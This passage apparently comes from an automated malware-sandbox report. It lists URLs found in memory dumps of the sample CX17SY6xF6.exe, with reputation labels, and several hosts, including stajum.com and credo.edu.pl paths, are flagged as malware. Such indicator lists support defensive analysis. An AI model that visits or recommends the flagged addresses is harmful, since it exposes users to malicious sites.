00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.717584525.00000000038B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://pohlfood.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.14.1CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://www.stajum.com/NCX17SY6xF6.exe, 00000000.00000003.768564697.0000000000E3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://www.quadlock.com/SbCX17SY6xF6.exe, 00000000.00000003.577604491.0000000000E54000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.576091404.0000000000E5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-600x599.jpgCX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/pretvorniki-tlaka-wika/CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://www.com-sit.com/wp-content/uploads/premium-addons-elementor/pa-frontend-2947ecb72.min.css?verCX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/prikazovalniki-temperature/CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/jquery.qtip.min.CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://www.pwd.org/CX17SY6xF6.exe, 00000000.00000002.888204578.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.720829263.0000000007560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.888204578.0000000007222000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?verCX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://net3.necs.com/pohlfood/site/search?selectview=byclass&amp;queryCol=&amp;terms=pizzaCX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://www.elpro.si/avtorji/CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://www.credo.edu.pl/mCX17SY6xF6.exe, 00000000.00000003.577691996.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.577519775.0000000000E90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-34-eu/CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://www.elpro.si/kategorija-izdelka/rotronic/tlak-rotronic-merilniki-tlaka/CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://www.stajum.com/VCX17SY6xF6.exe, 00000000.00000003.768564697.0000000000E3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.css?verCX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-100x100.jpgCX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://hotel-amadeus-frankfurt.de/uploads/pictures/resized/20130104085305_100_0645_105x0-aspect-wr.JCX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.639995551.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://net3.necs.com/pohlfood/site/search?selectview=choose&amp;queryCol=class&amp;terms=MediterranCX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://pohlfood.com/comments/feed/CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://www.com-sit.com/testhouse/CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
